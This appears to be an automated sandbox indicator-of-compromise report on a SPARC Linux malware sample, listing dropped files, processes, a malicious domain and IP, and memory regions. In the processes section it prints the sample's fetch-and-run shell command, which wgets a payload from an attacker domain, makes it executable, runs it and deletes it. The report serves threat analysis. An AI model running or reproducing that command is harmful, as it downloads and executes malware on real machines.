IOC Report
sparc.elf

loading gif

Files

File Path
Type
Category
Malicious
sparc.elf
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, with debug_info, not stripped
initial sample
malicious
/tmp/qemu-open.9b9o37 (deleted)
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/sparc.elf
/tmp/sparc.elf
/tmp/sparc.elf
-
/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
/bin/sh
-
/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
/bin/sh
-
/usr/bin/chmod
chmod 777 .....
/bin/sh
-
/bin/sh
/bin/sh ./.....
/bin/sh
-
/usr/bin/rm
rm -rf .....
/tmp/sparc.elf
-
/tmp/sparc.elf
-
/tmp/sparc.elf
-
There are 4 hidden processes, click here to show them.

Domains

Name
IP
Malicious
gay.energy
unknown
malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
92.60.77.69
unknown
Italy
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
7f694c02d000
page execute read
malicious
7f694c02d000
page execute read
malicious
7f694c02d000
page execute read
malicious
55774c52f000
page read and write
7f6a52b29000
page read and write
55774a511000
page read and write
55774a511000
page read and write
7f6a52029000
page read and write
7f6a52b6e000
page read and write
55774c52f000
page read and write
7f6a52037000
page read and write
7f6a52029000
page read and write
7fff6d3bb000
page execute read
55774a2e3000
page execute read
7f694c045000
page read and write
7f6a52b29000
page read and write
7f6a4c000000
page read and write
7f6a529f8000
page read and write
7f694c045000
page read and write
7f6a529f8000
page read and write
55774a51a000
page read and write
7f694c03e000
page read and write
7f6a52688000
page read and write
7f6a51826000
page read and write
7f6a52029000
page read and write
7fff6d2e6000
page read and write
7f694c045000
page read and write
7f6a52688000
page read and write
55774d938000
page read and write
55774c518000
page execute and read and write
7f6a51826000
page read and write
7f6a52037000
page read and write
55774d938000
page read and write
7f6a52037000
page read and write
55774a511000
page read and write
7f694c03e000
page read and write
7f6a522c6000
page read and write
7f6a4c021000
page read and write
7f6a52b6e000
page read and write
7f6a4c000000
page read and write
7fff6d3bb000
page execute read
55774c518000
page execute and read and write
7f6a4c021000
page read and write
7f6a522c6000
page read and write
55774a51a000
page read and write
7fff6d3bb000
page execute read
7f6a4c000000
page read and write
55774a51a000
page read and write
55774a2e3000
page execute read
7f6a52b21000
page read and write
55774c518000
page execute and read and write
7f6a51826000
page read and write
7f6a52b21000
page read and write
7f6a4c021000
page read and write
7f6a526ad000
page read and write
7f6a52b21000
page read and write
55774a2e3000
page execute read
7fff6d2e6000
page read and write
7f6a526ad000
page read and write
7f6a52b29000
page read and write
7f6a529f8000
page read and write
7f6a52688000
page read and write
7f6a522c6000
page read and write
7f6a526ad000
page read and write
7fff6d2e6000
page read and write
7f694c03e000
page read and write
55774c52f000
page read and write
7f6a52b6e000
page read and write
55774d938000
page read and write
There are 59 hidden memdumps, click here to show them.